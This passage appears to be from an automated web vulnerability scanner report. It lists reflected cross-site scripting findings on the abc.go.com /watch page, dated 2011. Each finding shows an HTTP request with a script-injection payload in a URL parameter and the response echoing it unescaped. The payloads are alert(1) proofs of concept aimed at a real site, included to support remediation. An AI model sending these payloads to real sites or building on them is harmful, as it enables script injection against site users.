Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F992fa--><script>alert(1)</script>cc4d89a2688&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:27 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:27 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F992fa--><script>alert(1)</script>cc4d89a2688&partner=&pc=&pl=&brandid=001 -->
...[SNIP]...

1.19. http://abc.go.com/watch [aff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aff request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3315a"-alert(1)-"b50500fdfde was submitted in the aff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo3315a"-alert(1)-"b50500fdfde&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:15 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:15 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
>
   var crumbs = new abcdm.abc.vp2.ui.breadcrumb.Breadcrumb('breadcrumb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?i=1&aff=komo3315a"-alert(1)-"b50500fdfde&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~R
...[SNIP]...

1.20. http://abc.go.com/watch [aff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aff request parameter is copied into an HTML comment. The payload b4702--><script>alert(1)</script>cf5748d6729 was submitted in the aff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komob4702--><script>alert(1)</script>cf5748d6729&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:17 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:17 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?i=1&aff=komob4702--><script>alert(1)</script>cf5748d6729&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~R
...[SNIP]...

1.21. http://abc.go.com/watch [al parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the al request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload add94"-alert(1)-"da4ce7e27d2 was submitted in the al parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.pngadd94"-alert(1)-"da4ce7e27d2&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:21 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:20 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
mb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.pngadd94"-alert(1)-"da4ce7e27d2&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=&brandid=001","cookieName" : "abc_v
...[SNIP]...

1.22. http://abc.go.com/watch [al parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the al request parameter is copied into an HTML comment. The payload 62285--><script>alert(1)</script>0ee6960a174 was submitted in the al parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png62285--><script>alert(1)</script>0ee6960a174&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:22 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:22 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png62285--><script>alert(1)</script>0ee6960a174&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=&brandid=001 -->
...[SNIP]...

1.23. http://abc.go.com/watch [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeaf7"-alert(1)-"bf408a71e3b was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1eeaf7"-alert(1)-"bf408a71e3b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:10 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:10 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
vascript">
   var crumbs = new abcdm.abc.vp2.ui.breadcrumb.Breadcrumb('breadcrumb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?i=1eeaf7"-alert(1)-"bf408a71e3b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3
...[SNIP]...

1.24. http://abc.go.com/watch [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the i request parameter is copied into an HTML comment. The payload bd0a6--><script>alert(1)</script>1c4bcbbcc0b was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1bd0a6--><script>alert(1)</script>1c4bcbbcc0b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:12 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:12 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?i=1bd0a6--><script>alert(1)</script>1c4bcbbcc0b&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3
...[SNIP]...

1.25. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c78"-alert(1)-"857dd371022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?22c78"-alert(1)-"857dd371022=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:06 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:06 GMT
Content-Length: 15628
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
/javascript">
   var crumbs = new abcdm.abc.vp2.ui.breadcrumb.Breadcrumb('breadcrumb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?22c78"-alert(1)-"857dd371022=1&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

1.26. http://abc.go.com/watch [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 79066--><script>alert(1)</script>bceb9d2f1a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?79066--><script>alert(1)</script>bceb9d2f1a4=1 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:08 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:07 GMT
Content-Length: 15676
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?79066--><script>alert(1)</script>bceb9d2f1a4=1&brandid=001 -->
...[SNIP]...

1.27. http://abc.go.com/watch [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the partner request parameter is copied into an HTML comment. The payload fce41--><script>alert(1)</script>a0f23fb5a53 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=fce41--><script>alert(1)</script>a0f23fb5a53&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:32 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:32 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
c.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=fce41--><script>alert(1)</script>a0f23fb5a53&pc=&pl=&brandid=001 -->
...[SNIP]...

1.28. http://abc.go.com/watch [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbab2"-alert(1)-"8115564337a was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=dbab2"-alert(1)-"8115564337a&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:30 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:30 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
c.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=dbab2"-alert(1)-"8115564337a&pc=&pl=&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

1.29. http://abc.go.com/watch [pc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cafe5"-alert(1)-"bce35d84227 was submitted in the pc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=cafe5"-alert(1)-"bce35d84227&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:36 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc02
Cache-Expires: Wed, 23 Feb 2011 23:12:36 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
m/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=cafe5"-alert(1)-"bce35d84227&pl=&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

1.30. http://abc.go.com/watch [pc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the pc request parameter is copied into an HTML comment. The payload c68cf--><script>alert(1)</script>95f6c7f6244 was submitted in the pc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=c68cf--><script>alert(1)</script>95f6c7f6244&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:37 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:37 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
